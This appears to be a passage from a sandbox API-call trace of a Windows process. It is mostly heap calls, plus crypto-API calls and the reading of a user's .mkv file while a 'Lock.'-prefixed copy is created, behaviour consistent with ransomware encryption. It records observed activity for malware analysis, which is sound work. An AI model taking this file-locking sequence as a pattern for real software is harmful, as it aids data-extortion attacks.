RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0235.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0235.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0235.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0235.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0235.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0235.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0235.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.804] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0235.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699a8 [0235.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0235.804] CryptDestroyHash (hHash=0xa87250) returned 1 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0235.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0235.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0235.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/P22ObdW9p9DNX.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p22obdw9p9dnx.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0235.910] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.910] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0235.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0235.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0235.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0235.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0235.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.911] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0235.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0235.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0235.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0235.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0235.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.P22ObdW9p9DNX.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.p22obdw9p9dnx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0235.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0235.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0235.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0235.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0235.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0235.925] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0235.925] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xd180, lpOverlapped=0x0) returned 1 [0235.929] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0235.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0235.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd180) returned 0x2f14818 [0235.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0235.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd180) returned 0x2f219a0 [0235.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd180) returned 0x2f14818 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: 